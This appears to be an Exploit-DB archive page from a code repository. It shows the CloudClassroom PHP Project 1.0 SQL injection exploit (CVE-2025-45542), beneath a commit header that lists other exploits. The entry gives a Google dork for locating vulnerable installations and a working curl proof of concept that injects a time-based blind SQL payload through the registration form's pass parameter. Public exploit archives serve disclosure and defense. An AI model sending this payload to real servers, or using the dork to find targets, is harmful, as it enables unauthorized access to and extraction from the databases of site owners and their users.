2825165fed
7 changes to exploits/shellcodes/ghdb macOS LaunchDaemon iOS 17.2 - Privilege Escalation ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE) Apache Tomcat 10.1.39 - Denial of Service (DoS) Grandstream GSD3710 1.0.11.13 - Stack Overflow CloudClassroom PHP Project 1.0 - SQL Injection Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
22 lines
No EOL
1.1 KiB
Text
22 lines
No EOL
1.1 KiB
Text
# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection
|
|
# Google Dork: inurl:CloudClassroom-PHP-Project-master
|
|
# Date: 2025-05-30
|
|
# Exploit Author: Sanjay Singh
|
|
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
|
|
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
|
|
# Version: 1.0
|
|
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
|
|
# CVE : CVE-2025-45542
|
|
|
|
# Description:
|
|
# A time-based blind SQL injection vulnerability exists in the pass parameter
|
|
# of the registrationform endpoint. An attacker can exploit this issue by sending
|
|
# a malicious POST request to delay server response and infer data.
|
|
|
|
# PoC Request (simulated using curl):
|
|
|
|
curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
|
|
-H "Content-Type: application/x-www-form-urlencoded" \
|
|
-d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="
|
|
|
|
# The server response will be delayed if the SQL condition is true, confirming the injection point. |